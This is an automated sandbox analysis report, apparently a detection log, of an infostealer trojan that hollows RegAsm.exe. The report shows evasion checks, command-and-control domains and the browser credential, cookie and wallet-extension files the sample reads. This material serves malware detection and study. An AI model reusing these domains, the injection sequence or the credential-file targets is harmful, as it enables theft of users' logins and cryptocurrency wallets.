      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6056 -s 304
      Source: mkFOY01Gl5.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/9@2/1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042F339 CoCreateInstance,4_2_0042F339
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6056
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6176
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_03
      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\4499b26f-bbfc-47a7-9773-f6a26885698dJump to behavior
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: mkFOY01Gl5.exeReversingLabs: Detection: 68%
      Source: mkFOY01Gl5.exeVirustotal: Detection: 71%
      Source: unknownProcess created: C:\Users\user\Desktop\mkFOY01Gl5.exe "C:\Users\user\Desktop\mkFOY01Gl5.exe"
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6056 -s 304
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6176 -s 1796
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeSection loaded: apphelp.dll
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
      Source: mkFOY01Gl5.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: mkFOY01Gl5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_000F76AD push ecx; ret 0_2_000F76C0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: FirmwareTableInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5068Thread sleep time: -120000s >= -30000s
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_0010AA16 FindFirstFileExW,0_2_0010AA16
      Source: Amcache.hve.7.drBinary or memory string: VMware
      Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
      Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
      Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
      Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
      Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
      Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
      Source: RegAsm.exe, 00000004.00000002.2574481805.0000000000B86000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2574481805.0000000000BB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
      Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
      Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.7.drBinary or memory string: vmci.sys
      Source: Amcache.hve.7.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
      Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
      Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
      Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.7.drBinary or memory string: VMware20,1
      Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
      Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
      Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
      Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
      Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
      Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
      Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
      Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
      Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
      Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
      Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_4-11821
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformation
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeProcess queried: DebugPort
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPort
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0043AAC0 LdrInitializeThunk,4_2_0043AAC0
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_000FBA03 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000FBA03
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_00106AF1 mov eax, dword ptr fs:[00000030h]0_2_00106AF1
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_00106B35 mov eax, dword ptr fs:[00000030h]0_2_00106B35
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_00101FC4 mov ecx, dword ptr fs:[00000030h]0_2_00101FC4
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_0010E15F GetProcessHeap,0_2_0010E15F
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_000F79C6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_000F79C6
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_000F7CC9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000F7CC9
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_000F7E25 SetUnhandledExceptionFilter,0_2_000F7E25

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_022C018D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_022C018D
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
      Source: mkFOY01Gl5.exe, 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: pedestriankodwu.xyz
      Source: mkFOY01Gl5.exe, 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: towerxxuytwi.xyzd
      Source: mkFOY01Gl5.exe, 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: ellaboratepwsz.xyzu
      Source: mkFOY01Gl5.exe, 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: penetratedpoopp.xyz
      Source: mkFOY01Gl5.exe, 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: swellfrrgwwos.xyz
      Source: mkFOY01Gl5.exe, 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: contintnetksows.shop
      Source: mkFOY01Gl5.exe, 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: foodypannyjsud.shop
      Source: mkFOY01Gl5.exe, 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: potterryisiw.shop
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43F000
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 442000
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 454000
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 74F008
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_000F779C cpuid 0_2_000F779C
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: GetLocaleInfoW,0_2_00106831
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: EnumSystemLocalesW,0_2_0010D83B
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: EnumSystemLocalesW,0_2_0010D886
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: EnumSystemLocalesW,0_2_0010D921
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0010D9AC
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: EnumSystemLocalesW,0_2_001062CB
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: GetLocaleInfoW,0_2_0010DBFF
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0010DD28
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_0010D599
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: GetLocaleInfoW,0_2_0010DE2E
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0010DEFD
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: GetLocaleInfoW,0_2_0010D794
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_000F7BC3 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_000F7BC3
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
      Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
      Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
      Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffffla
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
